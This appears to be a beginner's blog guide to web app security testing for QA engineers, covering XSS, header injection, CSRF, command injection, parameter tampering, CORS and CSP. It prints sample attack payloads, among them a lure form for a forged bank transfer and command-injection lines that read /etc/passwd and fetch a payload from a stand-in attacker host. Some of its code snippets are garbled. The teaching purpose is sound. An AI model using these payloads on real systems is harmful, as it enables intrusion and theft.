This article explores fundamental vulnerabilities and testing techniques, providing practical insights to enhance your web app pentesting skills. The article combines a series of my posts dedicated to QA engineers and analysts, providing a practical exploration of fundamental cybersecurity vulnerabilities. The purpose is to empower QA Engineers/Testers/Analysts with knowledge that bridges the gap between software QA and cybersecurity, fostering a unified approach to ensure the integrity and security of web applications.
This is not an ultimate guide, but I would like to share my experience as a QA engineer who is interested in the cybersecurity field; it’ll be quite superficial info with some useful links if you’re interested in learning some aspects deeper.
One of the critical and most common vulnerabilities is XSS - https://owasp.org/www-community/attacks/xss/
I'll share a simple approach and tips on how to test for XSS without having extensive knowledge in the field and frontend dev technologies.
<script>alert('XSS');</script>
(%0ejavascript:alert(/XSS/))
Submit the input and see if the script executes.
If it does, then the application is vulnerable to XSS attacks.
If the script doesn't execute, try modifying the input by adding other HTML tags, such as <img> or <iframe>, and see if they are reflected on the page, e.g. (this example almost always works for me)
<b>t</b>#`"/*—est
You can add a script to query params of your web app URL or a user name, uploaded file names (https://github.com/cure53/H5SC), or any text that will be displayed on the app page that you can change.
Be aware of front-end validations of inputs. Always try to submit the value using a direct request (using Postman, Burp, or any similar tools).
Use fuzzing and a list of payloads - automate this approach when possible or use special tools for it.
Speaking about tools, there are plenty of them for discovering XSS, trying different ones, comparing results several times with different apps, and choosing the one you like the most: https://linuxhint.com/free_xss_tools/ (I have used a lot OWASP ZAP and BurpSuite).
Personally, I like using payloads and info from here - https://github.com/s0md3v/AwesomeXSS - a very useful resource, in my opinion.
For more details about XSS and payloads, you can find the following resources:
This vulnerability occurs when an attacker can inject malicious code into the header of a website, allowing them to execute unauthorized actions or access sensitive information.
To test for Header injections, you can follow a few steps:
(%0d%0a OR \r\n)
For example, the following payload could be used to inject a Set-Cookie header:
User-Agent: Mozilla/5.0\r\nSet-Cookie: sessionid=111111
https:// yoursite. com?cookie=123%0D%0ASet-Cookie%3A%20TESTCOOKIE=hacked
Another example is the Host header injection, where an attacker can manipulate the Host header to access another website or subdomain on the same server. For example:
Host: yoursite.com\r\n\r\nGET /admin HTTP/1.1\r\nHost: admin.yoursite.com
To learn more about Header injections, you can refer to the following resources:
CSRF occurs when a malicious website tricks a user into acting on a different website that the user is currently logged in to. This type of attack can result in unauthorized actions (any POST request) being performed on the user's behalf.
To test for CSRF vulnerabilities, in a nutshell, you can do the following:
<html>
<body onload="document.forms[0].submit()">
<form action="https:// yoursite .com /money_transfer" method="POST"> <input type="hidden" name="toAccount" value="attackerAccount"> <input type="hidden" name="amount" value="1000">
</form>
</body>
</html>
To prevent CSRF attacks, use anti-CSRF tokens or same-site cookies to validate the origin of the request. These tokens are unique values that are generated by the server and included in the form or URL parameters. When the form is submitted, the server checks if the token matches the expected value and rejects the request if they don't match. Here's an example in Python:
import requests
# Get the CSRF token from the cookie
def get_csrf_token(): cookie = requests.utils.dict_from_cookiejar(requests.cookies)
return cookie.get('csrfToken')
# Send an HTTP request with the CSRF token in the headers
def send_http_request(url, data):
csrf_token = get_csrf_token()
headers = { 'Content-Type': 'application/json', 'X-CSRF-TOKEN': csrf_token }
response = requests.post(url, headers=headers, data=data)
return response
Useful resources:
RCE and Command Injection vulnerabilities occur when attackers can execute arbitrary code or OS commands on a target system. These types of attacks can result in the complete compromise of the system and unauthorized access to sensitive data.
To test for RCE and Command Injection vulnerabilities, in a nutshell, you can do the following:
; ls -la - list the contents of a directory
cat /etc/passwd - show the password file
wget https://myhackersite.evil/payload - download files with malicious code from a remote server
ping -c 1 https://www.linkedin.com/redir/general-malware-page?url=myhackersite%2eevil%2ecom - ping the attacker's website 3
Not all payloads will result in some visible output. In such cases, you may need to use other methods, such as monitoring network traffic or reviewing log files.
To prevent RCE and Command Injection attacks, user input has to be validated, and malicious characters or commands have to be removed or sanitized.
Here are some useful resources for further learning:
This type of attack occurs when you manipulate the params sent from the client side to the server side, leading, for example, to unauthorized access or privilege escalation.
To test for this type of vulnerability, you can do the following:
Identify input fields or params that can be manipulated. Similar to other vulnerabilities, you can use a tool like Burp Suite to intercept and modify HTTP requests and responses.
Modify the params. For example, if a parameter controls the price of a product, you can modify it to purchase items for a lower price:
- change the price of a product from 10 to 1.
- bypass authentication by manipulating the user ID parameter.
- change the quantity of a product to a negative number to get a refund or to a higher number to get more items for the price of 1 item.
Check the behavior of the application to see if the tampering was successful. For example, if you successfully change the price, the application should reflect that change when you check the cart or receipt.
And of course, report your findings to the devs so they can fix the issue before it becomes a security risk.
To prevent Web Parameter Tampering attacks, input validation and sanitization are crucial. Ensure that all input data is validated on the server side and that the application rejects any malicious inputs. I would say that these types of vulnerabilities are the best ones to be identified by a QA team because QAs know the application/product and its logic and params better than infosec engineers who usually are not involved in the dev process.
Here are some additional resources to help you learn more about Web Parameter Tampering:
This is a security mechanism that restricts web pages from making requests to a different domain than the one that served the web page.
You can test by doing the following:
fetch('https://beapimysite.com')
.then(response=>response.json())
.then(data=>{ console.log(data); })
access to fetch at 'https://beapimysite.com' from origin 'https://www. google.com' has been blocked by CORS policy: No 'Access-Control-Allow-Origin' header is present on the requested resource.
Do these simple steps:
Request from https://mysite.com to https://beapimysite.com:
GET /api/data HTTP/1.1
Host: beapimysite.com
Origin: https ://mysite.com
Access-Control-Request-Method: GET
Access-Control-Request-Headers: X-Requested-With
Response:
HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, OPTIONS
Access-Control-Allow-Headers: X-Requested-With
For more information on CORS, here are some helpful resources:
CSP is a mechanism that helps prevent XSS attacks by allowing to specify which sources of content are allowed to be loaded on the web pages. Without a CSP header set, it’s potentially possible to inject malicious scripts into the page and steal sensitive user data or perform other actions.
You can do the following to check the CSP header:
document.cookie=TESTCOOKIE=XSS;
Try to inject a script into the page and see if it executes. For example, insert the following code to the browser console:
var script = document.create;
Element('script');script.src = 'http://dangeroussite.com/dolphin.js';
document.head.appendChild(script);
Look for the Content-Security-Policy header in the response headers. If this header is missing, it means that the web page has no CSP header set.
The CSP header is an important thing in web app security.
For more information on CSP:
The symbiotic relationship between cybersecurity and software QA is important in terms of the security of software apps. Through the integration of threat modeling methodologies and automated fuzz testing techniques, QA engineers contribute significantly to the early detection and mitigation of security vulnerabilities. The collaboration between cybersecurity and QA teams forms an integral part of a unified approach to software development, with QA's role extending beyond functional and usability testing to encompass proactive identification and rectification of potential security flaws. Recognizing QA as a strategic asset in cybersecurity efforts is important, as it not only enhances data protection but also safeguards a company's reputation, customer trust, and overall financial stability. The technical skills of QA professionals, coupled with their rigorous testing practices, establish a robust defense against cyber threats.
Always conduct penetration testing with explicit permission and within a controlled environment. This ethical approach ensures that security assessments align with responsible testing protocols, preventing inadvertent compromises to systems and upholding the integrity of both the testing process and overarching cybersecurity strategy.
This article shares practical tips for QA engineers to improve web app security testing, connecting software QA and cybersecurity. It's a beginner-friendly guide with insights and useful links for those looking to learn more.
Also published here.